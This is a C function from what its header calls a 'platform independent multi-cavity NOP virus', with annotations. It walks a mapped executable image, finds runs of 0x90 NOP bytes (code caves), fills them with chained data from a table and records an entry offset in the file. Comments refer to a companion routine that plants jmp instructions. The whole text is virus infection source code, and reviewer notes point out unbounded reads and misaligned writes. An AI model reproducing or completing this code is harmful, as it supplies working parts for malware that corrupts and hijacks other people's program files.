RECON06 . A PLATFORM INDEPENDENT MULTI-CAVITY NOP VIRUS
/*
 * lay_down_sizes - walk a mapped file image and overwrite runs of 0x90 bytes
 * with values taken from `sizes`, chaining the runs together by offset.
 *
 * map      - start of the writable file image that is scanned and modified.
 * q        - not referenced anywhere in this body.
 * filesize - upper bound used by the outer loop on the scan index.
 * vstart   - byte offset into map where the offset of the first usable run
 *            is stored as a 32-bit value.
 *
 * `sizes` is not declared in this block; the loop conditions treat a 0x0
 * entry as its terminator (presumably a file-scope byte table; confirm
 * against its definition).
 *
 * Artifacts left in the image, as written by the code below: every run of at
 * least six 0x90 bytes that is reached has its leading bytes replaced by
 * `sizes` values, followed by one 0x88 byte and a 4-byte slot; the slot is
 * filled with a relative offset only if a later qualifying run is found. In
 * addition, four bytes at map + vstart are overwritten with the offset of
 * the first such run.
 *
 * NOTE(review): neither inner scan loop is bounded by filesize, so both can
 * read past the end of the image when no further 0x90 / non-0x90 byte exists.
 * NOTE(review): the uint32_t stores go through casts of byte pointers at
 * arbitrary offsets, so they may be misaligned.
 */
void lay_down_sizes(unsigned char *map, struct q_item *q, int filesize, unsigned int vstart) {
unsigned char *p = NULL;
uint32_t *lastSzOff = NULL; /* 4-byte slot after the previous run's 0x88 marker; NULL until a first run is used */
uint32_t last; /* index just past that slot; only read once lastSzOff has been set */
int i, n, s; /* i: scan index into p, n: bytes left in the current run, s: index into sizes */
p = map;
/* Stop at the end of the image or once the next sizes entry is the 0x0 terminator. */
for (i = 0, s = 0; i < filesize && sizes[s] != 0x0;) {
for (; p[i] != 0x90; i++)
; /* Find some nops */
for (n = 1; p[i + n] == 0x90; n++)
; /* Count how many */
/* Runs shorter than six bytes are skipped: five bytes are kept back for the marker and the 4-byte slot. */
if (n >= 6) {
if (lastSzOff != NULL) {
/* Fill the previous run's slot with the distance from the end of that slot to this run. */
*lastSzOff = i - last;
} else {
/* First usable run: record its absolute offset at map + vstart. */
uint32_t *x = (uint32_t *)(map + vstart);
*x = i;
}
/*
 * Copy sizes entries over the run until only five bytes of it remain.
 * The terminator is not re-checked per byte here, so a long run can
 * consume entries beyond the 0x0 that the outer loop tests for.
 */
do {
p[i++] = sizes[s++];
n--;
} while (sizes[0] == 0x0 ? 0 : n >= 6);
/* sizes[0] was already non-zero when the outer loop was entered at s == 0, so this test looks redundant unless sizes is modified elsewhere; confirm. */
if (sizes[0] != 0x0) {
p[i++] = 0x88; /* If this were the inject_nops() function then it would be 0xe9 for a jmp <32bitaddr> instead */
last = i + 4; /* index of the byte following the 4-byte slot */
lastSzOff = (uint32_t *)&p[i]; /* slot is left as-is here and written when the next run is found */
}
}
/* Skip the remainder of the run; n was not decremented for the marker byte, so this lands one byte past it. */
i += n;
}
}